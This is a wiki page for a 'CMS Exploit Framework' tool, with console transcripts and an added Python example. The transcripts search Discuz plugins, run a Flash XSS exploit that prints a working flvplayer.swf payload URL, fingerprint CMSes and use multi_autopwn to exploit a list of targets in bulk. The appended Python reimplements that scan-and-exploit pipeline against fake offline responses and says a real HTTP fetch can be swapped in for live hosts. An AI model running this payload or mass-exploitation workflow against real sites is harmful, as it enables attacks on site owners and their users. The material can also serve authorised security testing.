chuhades edited this page Dec 13, 2014 · 1 revision
Start the console with `python console.py`. Console commands:

- help: show help
- version: show the framework version
- update: update the plugin list
- rebuild_db: rebuild the database
- list: list available plugins
- search <keyword>: search plugins by keyword
- info <plugin>: show information about a plugin
- options: show the current plugin's options
- use <plugin>: select a plugin
- set <option> <value>: set a plugin option
- exploit: run the current plugin
- vulns: show the vulnerabilities detected so far
- vulns -d: clear the detected vulnerabilities
- vulns -o <plugin>: save the detected vulnerabilities to a file
- exit: exit the framework

Note:
[1] Commands support tab completion.
CMS Exploit Framework > search discuz
Matching Plugins
================
Name Scope Description
---- ------- -----------
discuz_faq_gids_sqli Discuz 7.1-7.2 /faq.php 参数 gids 未初始化 导致 SQL 注入
discuz_flvplayer_flash_xss Discuz! x3.0 /static/image/common/flvplayer.swf Flash XSS
CMS Exploit Framework > use discuz_flvplayer_flash_xss
CMS Exploit Framework > discuz_flvplayer_flash_xss > info
Name: discuz_flvplayer_flash_xss
CMS: discuz
Scope: Discuz! x3.0
Author:
Chu <[email protected]>
Description:
/static/image/common/flvplayer.swf Flash XSS
Reference:
http://www.ipuman.com/pm6/138/
CMS Exploit Framework > discuz_flvplayer_flash_xss > options
Name Current Setting Required Description
---- --------------- -------- -----------
URL True Site URL
CMS Exploit Framework > discuz_flvplayer_flash_xss > set URL http://bbs.xxoo.com
URL => http://bbs.xxoo.com
CMS Exploit Framework > discuz_flvplayer_flash_xss > exploit
[*]Requesting target site
[+]Exploitable!
[+]http://bbs.xxoo.com/static/image/common/flvplayer.swf?file=1.flv&linkfromdisplay=true&link=javascript:alert(1);
CMS Exploit Framework > discuz_flvplayer_flash_xss > vulns
Vulns
=====
Plugin Vuln
------ ----
discuz_flvplayer_flash_xss http://bbs.xxoo.com/static/image/common/flvplayer.swf?file=1.flv&linkfromdisplay=true&link=javascript:alert(1);
multi_whatweb: detects the CMS used by the target site.
Options:

- URL: site URL
- Thread: number of threads
CMS Exploit Framework > discuz_flvplayer_flash_xss > use multi_whatweb
CMS Exploit Framework > multi_whatweb > set URL http://www.discuz.net
URL => http://www.discuz.net
CMS Exploit Framework > multi_whatweb > exploit
[+]http://www.discuz.net: discuz
multi_autopwn: batch exploitation across many targets.
Options:

- Plugins: list of plugins, separated by commas. All enables every plugin.
- Target: site URL.
- Target_file: file of site URLs; targets are read from this file.
- WhatWeb: whether to fingerprint the CMS with the whatweb plugin before exploiting. Y for yes, N for no.
- Thread: number of processes.
CMS Exploit Framework > use multi_autopwn
CMS Exploit Framework > multi_autopwn > set Plugins discuz_flvplayer_flash_xss
Plugins => discuz_flvplayer_flash_xss
CMS Exploit Framework > multi_autopwn > set Target_file /tmp/domains.txt
Target_file => /tmp/domains.txt
CMS Exploit Framework > multi_autopwn > exploit
[*]Loading Plugins
[*]Loading multi_whatweb
[+]http://bbs.xxoo.com: discuz
[+]http://www.discuz.net: discuz
[+]http://rs.xxoo.com: discuz
[*]Loading discuz_flvplayer_flash_xss
[*]Requesting target site
[*]Requesting target site
[*]Requesting target site
[*]Requesting target site
[+]Exploitable!
[+]http://bbs.xxoo.com/static/image/common/flvplayer.swf?file=1.flv&linkfromdisplay=true&link=javascript:alert(1);
Vulns
=====
Plugin Vuln
------ ----
discuz_flvplayer_flash_xss http://bbs.xxoo.com/static/image/common/flvplayer.swf?file=1.flv&linkfromdisplay=true&link=javascript:alert(1);
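The transcripts above show the three moving parts of a run: a single plugin that requests the target and prints a PoC URL, multi_whatweb fingerprinting the CMS, and multi_autopwn reading targets from Target_file and (with WhatWeb=Y) only running a plugin against sites whose detected CMS matches. The block below is an added example, not code from CMS Exploit Framework, that models that pipeline in plain Python so it can be run offline. Only the flvplayer.swf path and the PoC query string are taken from the transcript; the Discuz fingerprint heuristic, the SWF magic-byte presence check, the injected `fetch` callable, the `FAKE_SITES` responses and the `TARGET_FILE` contents are all assumptions of the example, not behaviour documented by the project.

```python
"""Added example: a small model of whatweb -> plugin -> autopwn.
Not the project's code. Fingerprint rules, the SWF magic check, the
fetch() signature and the sample sites are assumptions of this example."""
from concurrent.futures import ThreadPoolExecutor
from typing import Callable, Dict, List, Optional, Tuple

# fetch(url) -> (status_code, body_bytes). Injected so the example runs offline;
# a real run would wrap requests.get() in the same shape.
Fetch = Callable[[str], Tuple[int, bytes]]

FLVPLAYER_PATH = "/static/image/common/flvplayer.swf"          # from the transcript
FLVPLAYER_POC = "?file=1.flv&linkfromdisplay=true&link=javascript:alert(1);"


def normalize_target(line: str) -> Optional[str]:
    """One Target_file line -> base URL, or None for blank/comment lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if not line.startswith(("http://", "https://")):
        line = "http://" + line        # assumption: bare hosts default to HTTP
    return line.rstrip("/")


def load_targets(text: str) -> List[str]:
    """Parse Target_file contents, keeping order and dropping duplicates."""
    seen, out = set(), []
    for raw in text.splitlines():
        url = normalize_target(raw)
        if url and url not in seen:
            seen.add(url)
            out.append(url)
    return out


def whatweb(base: str, fetch: Fetch) -> Optional[str]:
    """Crude CMS fingerprint (assumed heuristic, not the project's rules)."""
    status, body = fetch(base + "/")
    if status == 200 and b"discuz" in body.lower():
        return "discuz"
    return None


def discuz_flvplayer_flash_xss(base: str, fetch: Fetch) -> Optional[str]:
    """Return the PoC URL when the SWF is really there, else None.
    Assumption: presence = HTTP 200 and an SWF magic (FWS/CWS/ZWS), so a
    soft-404 page served as HTML at that path is not reported."""
    url = base + FLVPLAYER_PATH
    status, body = fetch(url)
    if status == 200 and body[:3] in (b"FWS", b"CWS", b"ZWS"):
        return url + FLVPLAYER_POC
    return None


# plugin name -> (CMS it applies to, check function)
PLUGINS = {"discuz_flvplayer_flash_xss": ("discuz", discuz_flvplayer_flash_xss)}


def autopwn(targets: List[str], plugin_names: List[str], fetch: Fetch,
            use_whatweb: bool = True, threads: int = 4) -> Dict[str, List[str]]:
    """Run the named plugins over every target; returns {plugin: [poc urls]}."""
    vulns: Dict[str, List[str]] = {name: [] for name in plugin_names}

    def run_one(base: str) -> List[Tuple[str, str]]:
        cms = whatweb(base, fetch) if use_whatweb else None
        hits = []
        for name in plugin_names:
            wanted_cms, check = PLUGINS[name]
            if use_whatweb and cms != wanted_cms:
                continue               # WhatWeb=Y: skip plugins for other CMSes
            poc = check(base, fetch)
            if poc:
                hits.append((name, poc))
        return hits

    with ThreadPoolExecutor(max_workers=threads) as pool:
        for hits in pool.map(run_one, targets):   # map keeps target order
            for name, poc in hits:
                vulns[name].append(poc)
    return vulns


# Constructed offline responses standing in for the three hosts in the transcript.
FAKE_SITES = {
    "http://bbs.xxoo.com/": (200, b"<html>Powered by Discuz! X3.0</html>"),
    "http://bbs.xxoo.com" + FLVPLAYER_PATH: (200, b"CWS\x0a\x00\x00\x00"),
    "http://www.discuz.net/": (200, b"<html>Discuz! Official</html>"),
    "http://www.discuz.net" + FLVPLAYER_PATH: (404, b""),
    "http://rs.xxoo.com/": (200, b"<html>Powered by Discuz!</html>"),
    "http://rs.xxoo.com" + FLVPLAYER_PATH: (200, b"<html>soft 404</html>"),
}


def fake_fetch(url: str) -> Tuple[int, bytes]:
    return FAKE_SITES.get(url, (404, b""))


# Constructed sample Target_file: bare host, trailing slash, blank, comment, duplicate.
TARGET_FILE = "bbs.xxoo.com\nhttp://www.discuz.net/\n\n# comment\nrs.xxoo.com\nbbs.xxoo.com\n"

if __name__ == "__main__":
    results = autopwn(load_targets(TARGET_FILE), ["discuz_flvplayer_flash_xss"], fake_fetch)
    for name, pocs in results.items():
        for poc in pocs:
            print(f"[+]{name} {poc}")
```

With the constructed responses, only bbs.xxoo.com is reported, matching the transcript's single Vulns row: www.discuz.net returns 404 for the SWF, and rs.xxoo.com answers the SWF path with an HTML soft-404, which a status-only check would have flagged as exploitable. Swap `fake_fetch` for a function that performs a real HTTP request to run it against live hosts you are authorised to test.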